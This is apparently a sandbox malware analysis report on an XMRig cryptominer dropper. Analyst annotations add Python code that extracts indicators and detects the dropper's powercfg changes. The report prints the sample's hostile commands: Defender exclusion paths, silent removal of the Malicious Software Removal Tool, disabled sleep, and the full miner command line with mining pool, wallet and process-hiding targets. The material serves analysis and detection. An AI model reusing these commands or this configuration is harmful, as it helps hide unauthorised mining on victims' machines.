          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\svchost.exe; Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\svchost.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\svchost.exe; Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Windows\System32\svchost.exe; System information queried: FirmwareTableInformation
          Source: svchost.exe, 0000003B.00000002.3313207679.00000226EC82F000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: PROCESSHACKER.EXE
          Source: svchost.exe, 0000003B.00000003.2164031962.00000226EC86B000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXEQTLTRBGPVURODLWL
          Source: svchost.exe, 0000003B.00000002.3313323501.00000226EC89E000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXELLL
          Source: svchost.exe, 0000003B.00000002.3313207679.00000226EC82F000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: --CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
          Source: svchost.exe, 0000003B.00000002.3313207679.00000226EC82F000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: SVCHOST.EXE--ALGO=RX/0--URL=POOL.HASHVAULT.PRO:443--USER=8B8PNVYSZJOHWKUUNX7PPTKMQWXYGGWR51ZZFDE5WFGDGYV9XHLVKXAHSZA7RSHMD8PU2VNY9HRPBCQFUFE1IZ5BCZVZHFZ--PASS=6238110659--CPU-MAX-THREADS-HINT=40--CINIT-WINRING=GDTMKVYHYSUY.SYS--CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE--CINIT-STEALTH-FULLSCREEN--CINIT-VERSION=3.4.0--TLS--CINIT-IDLE-WAIT=5--CINIT-IDLE-CPU=80--CINIT-ID=QTLTRBGPVURODLWL
          Source: svchost.exe, 0000003B.00000003.2164031962.00000226EC86B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000003B.00000002.3313323501.00000226EC89E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000003B.00000002.3313207679.00000226EC82F000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
          Source: svchost.exe, 0000003B.00000002.3313207679.00000226EC82F000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: PROCESSHACKER.EXEBUFFERPOOL.HAS
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477 (2 entries; this is 2^63-1 in 100 ns units expressed in milliseconds, i.e. an indefinite wait rather than a timed sleep)
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 4400
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 5383
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 5470
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 4266
          Source: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exe; Dropped PE file which has not been started: C:\Windows\Temp\gdtmkvyhysuy.sys
          Source: C:\Windows\System32\conhost.exe; API coverage: 0.9 %
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7484; Thread sleep count: 4400 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7484; Thread sleep count: 5383 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7532; Thread sleep time: -7378697629483816s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2472; Thread sleep count: 5470 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2472; Thread sleep count: 4266 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2412; Thread sleep time: -3689348814741908s >= -30000s
          Source: C:\Windows\System32\sc.exe; WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS (2 entries)
          Source: C:\Windows\System32\sc.exe; WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem (2 entries)
          Source: C:\Windows\System32\conhost.exe; WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
          Source: C:\Windows\System32\svchost.exe; WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
          Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed (14 identical entries collapsed)
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477 (2 entries)
          Source: svchost.exe, 0000003B.00000002.3313257725.00000226EC86B000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAWMSAFD L2CAP [Bluetooth]=j
          Source: svchost.exe, 0000003B.00000002.3313207679.00000226EC85E000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW
          Source: svchost.exe, 0000003B.00000002.3313163287.00000226EC813000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW@
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information queried: ProcessInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process token adjusted: Debug (2 entries)
          Source: C:\Windows\System32\conhost.exe; Code function: 56_2_0000000140001160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit, 56_2_0000000140001160
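          The miner launch string recovered from svchost.exe memory above is the most useful artefact in this section, but the sandbox prints it upper-cased and with the spaces between arguments removed. The Python below is an added example, not part of the Joe Sandbox report and not code from the sample: it parses that string (and, as a generalisation, an ordinary spaced XMRig command line) into structured IOCs and flags that the wallet value cannot be used verbatim. The `RECOVERED` constant is a copy of the string shown above; the spaced command line used in the usage check, the option names treated as "cinit" loader flags, and all helper names are assumptions made for the example.

```python
"""Turn the miner launch string recovered from svchost.exe memory into structured IOCs."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Union

# Constructed copy of the command line the report recovered from svchost.exe memory
# (sandbox form: upper-cased, with the spaces between arguments lost).
RECOVERED = (
    "SVCHOST.EXE--ALGO=RX/0--URL=POOL.HASHVAULT.PRO:443"
    "--USER=8B8PNVYSZJOHWKUUNX7PPTKMQWXYGGWR51ZZFDE5WFGDGYV9XHLVKXAHSZA7RSHMD8PU2VNY9HRPBCQFUFE1IZ5BCZVZHFZ"
    "--PASS=6238110659--CPU-MAX-THREADS-HINT=40--CINIT-WINRING=GDTMKVYHYSUY.SYS"
    "--CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE"
    "--CINIT-STEALTH-FULLSCREEN--CINIT-VERSION=3.4.0--TLS--CINIT-IDLE-WAIT=5--CINIT-IDLE-CPU=80"
    "--CINIT-ID=QTLTRBGPVURODLWL"
)

# One option is "--name" optionally followed by "=value"; the value runs up to the next
# "--", so parsing does not depend on whitespace between arguments.
OPT_RE = re.compile(r"--([A-Za-z0-9]+(?:-[A-Za-z0-9]+)*)(?:=((?:(?!--).)*))?")

# Base58 alphabet used by Monero addresses: it contains no '0', 'O', 'I' or 'l'.
BASE58 = set("123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz")


def parse_miner_args(cmdline: str) -> Dict[str, Union[str, bool]]:
    """Map option names (lower-cased) to values; switches without a value map to True."""
    opts: Dict[str, Union[str, bool]] = {}
    for m in OPT_RE.finditer(cmdline):
        value = m.group(2)
        opts[m.group(1).lower()] = True if value is None else value.strip()
    return opts


@dataclass
class MinerIOCs:
    pool_host: str
    pool_port: Optional[int]
    tls: bool
    wallet: str
    wallet_case_lost: bool            # True when the dump cannot be a verbatim base58 address
    driver: Optional[str]             # kernel driver file name passed via --cinit-winring
    stealth_targets: List[str] = field(default_factory=list)  # tools that pause the miner
    idle_wait: Optional[int] = None   # --cinit-idle-wait (assumed: minutes of idle before mining)
    idle_cpu: Optional[int] = None    # --cinit-idle-cpu  (assumed: CPU share used while idle)


def _as_str(value: Union[str, bool, None]) -> str:
    return value if isinstance(value, str) else ""


def _as_int(value: Union[str, bool, None]) -> Optional[int]:
    return int(value) if isinstance(value, str) and value.isdigit() else None


def extract_iocs(opts: Dict[str, Union[str, bool]]) -> MinerIOCs:
    """Normalise the parsed options into the handful of values worth pivoting on."""
    url = re.sub(r"^[a-z+]+://", "", _as_str(opts.get("url")), flags=re.I)  # drop stratum+tcp:// etc.
    host, sep, port = url.rpartition(":")
    if not sep:                      # no port given
        host, port = url, ""
    wallet = _as_str(opts.get("user"))
    targets = _as_str(opts.get("cinit-stealth-targets"))
    return MinerIOCs(
        pool_host=host.lower(),
        pool_port=int(port) if port.isdigit() else None,
        tls=opts.get("tls") is True,
        wallet=wallet,
        # A real address is mixed-case base58. An all-caps dump, or one containing 'O'/'I',
        # has lost its case and must not be fed to pool or blockchain lookups as-is.
        wallet_case_lost=wallet.isupper() or not set(wallet) <= BASE58,
        driver=_as_str(opts.get("cinit-winring")).lower() or None,
        stealth_targets=[t.strip().lower() for t in targets.split(",") if t.strip()],
        idle_wait=_as_int(opts.get("cinit-idle-wait")),
        idle_cpu=_as_int(opts.get("cinit-idle-cpu")),
    )


if __name__ == "__main__":
    print(extract_iocs(parse_miner_args(RECOVERED)))
```

          Pivot on the pool host, the dropped driver file name and the `--cinit-id` value rather than on the wallet: the reported address contains `O` and `I`, characters the base58 alphabet does not have, so the sandbox's upper-casing destroyed the real value and only the pool operator can map it back.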

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Users\user\Desktop\lokigod.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force (listed twice in the report)
          Source: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force (listed twice in the report)
          Source: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exe; Thread register set: target process: 7604
          Source: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exe; Thread register set: target process: 7636
          Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart (2 entries)
          Source: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
          Source: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exe; Process created: C:\Windows\System32\svchost.exe svchost.exe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information (33 entries from the powershell.exe instances, duplicates collapsed):
          C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          C:\ VolumeInformation
          C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
          C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
          C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Users\user\Desktop\lokigod.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\Desktop\lokigod.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
(The same four process creations appeared a second time with behavior links; the duplicate set is omitted.)

Note: powercfg /x is the alias of /change and edits the active power scheme; a timeout of 0 means "never", so on AC power the machine neither sleeps nor hibernates and the miner keeps running unattended. Both the sample on the desktop and its persisted copy under C:\ProgramData issue the same two commands. On a suspect host, `powercfg /query SCHEME_CURRENT SUB_SLEEP` shows the current AC and DC index for "Sleep after" and "Hibernate after"; a 0x00000000 AC index on a machine that had a timeout configured before is the footprint of this change.

Source: svchost.exe, 0000003B.00000002.3313207679.00000226EC82F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: procexp.exe
(procexp.exe is Process Explorer; the string lives in the injected svchost.exe and belongs to the analysis-tool process-name check that the behavior graph flags for that process.)
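A detection over process-creation events for the powercfg behaviour listed above, as an added example that is not code from the Joe Sandbox report. The event lines are constructed for this example as flat `key=value|key=value` records carrying the Image, CommandLine and ParentImage fields a Sysmon Event ID 1 or Security 4688 event (with command-line auditing) would provide; the field names, the record format and the "untrusted parent directory" heuristic are assumptions of the example, chosen because both parents in this report live outside C:\Windows.

```python
"""Flag powercfg.exe runs that zero the sleep/hibernate timeouts, with parent context.

Added example; not code from the Joe Sandbox report. The events below are
constructed as flat 'key=value|key=value' lines carrying the Image, CommandLine
and ParentImage fields of a process-creation event; adapt parse_event() to your
real collector format. The untrusted-parent heuristic is an assumption of this
example.
"""

# Settings the sample sets to 0 (never); the -dc variants cover battery power.
SLEEP_SETTINGS = {
    "hibernate-timeout-ac", "hibernate-timeout-dc",
    "standby-timeout-ac", "standby-timeout-dc",
}
CHANGE_VERBS = {"x", "change"}          # powercfg /x is the alias of /change
UNTRUSTED_PARENT_PREFIXES = ("c:\\programdata\\", "c:\\users\\")


def parse_event(line: str) -> dict:
    """Split a constructed 'k=v|k=v' event line into a dict."""
    return dict(field.split("=", 1) for field in line.strip().split("|"))


def powercfg_sleep_changes(command_line: str) -> list:
    """Return the sleep/hibernate settings that this powercfg command line sets to 0.

    Option prefixes ('/' or '-') are normalised away, so '/x -standby-timeout-ac 0'
    and '-change standby-timeout-ac 0' are treated alike.
    """
    tokens = [t.strip('"').lstrip("/-").lower() for t in command_line.split()]
    for i, tok in enumerate(tokens):
        if tok in CHANGE_VERBS:
            rest = tokens[i + 1:]                 # (setting, value) pairs follow the verb
            return [s for s, v in zip(rest[0::2], rest[1::2])
                    if s in SLEEP_SETTINGS and v == "0"]
    return []


def detect(event_lines) -> list:
    """Return one finding per powercfg event that disables sleep or hibernation."""
    findings = []
    for line in event_lines:
        ev = parse_event(line)
        if not ev.get("Image", "").lower().endswith("\\powercfg.exe"):
            continue
        settings = powercfg_sleep_changes(ev.get("CommandLine", ""))
        if not settings:
            continue
        parent = ev.get("ParentImage", "")
        findings.append({
            "parent": parent,
            "settings": settings,
            "untrusted_parent": parent.lower().startswith(UNTRUSTED_PARENT_PREFIXES),
        })
    return findings


# Constructed events mirroring the report's process creations, plus two benign ones.
SAMPLE_EVENTS = [
    "Image=C:\\Windows\\System32\\powercfg.exe"
    "|CommandLine=C:\\Windows\\system32\\powercfg.exe /x -hibernate-timeout-ac 0"
    "|ParentImage=C:\\Users\\user\\Desktop\\lokigod.exe",
    "Image=C:\\Windows\\System32\\powercfg.exe"
    "|CommandLine=C:\\Windows\\system32\\powercfg.exe /x -standby-timeout-ac 0"
    "|ParentImage=C:\\ProgramData\\spvpfblnegdb\\vzppfnnlsyit.exe",
    # an administrator setting a 30-minute standby from a console: not flagged
    "Image=C:\\Windows\\System32\\powercfg.exe"
    "|CommandLine=powercfg /change standby-timeout-ac 30"
    "|ParentImage=C:\\Windows\\System32\\cmd.exe",
    "Image=C:\\Windows\\System32\\cmd.exe|CommandLine=cmd /c whoami"
    "|ParentImage=C:\\Windows\\explorer.exe",
]

if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

The value check (`== "0"`) rather than "any change" keeps a helpdesk script that sets a 30-minute timeout out of the alert queue; the parent path is carried in the finding because the parent, not the powercfg invocation, is what identifies the dropper.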
Mitre Att&ck Matrix (the 14-column grid was flattened by extraction; it is listed here by tactic column. Leading digits are the report's per-technique count badges, kept as extracted; entries without a badge are the grid's unmarked placeholder cells, not observations)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: 31 Windows Management Instrumentation; 1 Service Execution; At; Cron; Launchd; Scheduled Task; Systemd Timers
Persistence: 11 Windows Service; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Privilege Escalation: 11 Windows Service; 111 Process Injection; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items
Defense Evasion: 1 Masquerading; 1 Disable or Modify Tools; 141 Virtualization/Sandbox Evasion; 111 Process Injection; 1 Obfuscated Files or Information; 1 DLL Side-Loading; 1 File Deletion
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: 331 Security Software Discovery; 1 Process Discovery; 141 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 32 System Information Discovery; Wi-Fi Discovery; Remote System Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
Command and Control: 12 Encrypted Channel; 1 Non-Application Layer Protocol; 2 Application Layer Protocol; Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
Behavior Graph (ID 1568489, sample lokigod.exe, start date 04/12/2024, architecture WINDOWS, score 100), rendered as a process tree; node numbers are the graph's own.

Start (node 2)
  DNS/IP: windowsupdatebg.s.llnwi.net; pool.hashvault.pro
  Signatures: Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; Yara detected Xmrig cryptocurrency miner; 6 other signatures
  +- lokigod.exe (node 12)
  |    Dropped: C:\ProgramData\...\vzppfnnlsyit.exe (PE32+)
  |    Signatures: Uses powercfg.exe to modify the power settings; Modifies power options to not sleep / hibernate
  |    +- powershell.exe (node 22) -> conhost.exe (34)
  |    +- cmd.exe (node 24) -> conhost.exe (36), wusa.exe (38)
  |    +- powercfg.exe (node 26) -> conhost.exe (40)
  |    +- 12 other processes (node 30) -> conhost.exe (42), 11 other processes (48)
  +- vzppfnnlsyit.exe (node 8)
       Dropped: C:\Windows\Temp\gdtmkvyhysuy.sys (PE32+)
       Signatures: Multi AV Scanner detection for dropped file; Modifies the context of a thread in another process (thread injection); Adds a directory exclusion to Windows Defender; Sample is not signed and drops a device driver
       +- svchost.exe (node 14): connects to pool.hashvault.pro 37.203.243.102 port 443 (source port 49704), DAPLDATAPLANETLtdRU, Russian Federation
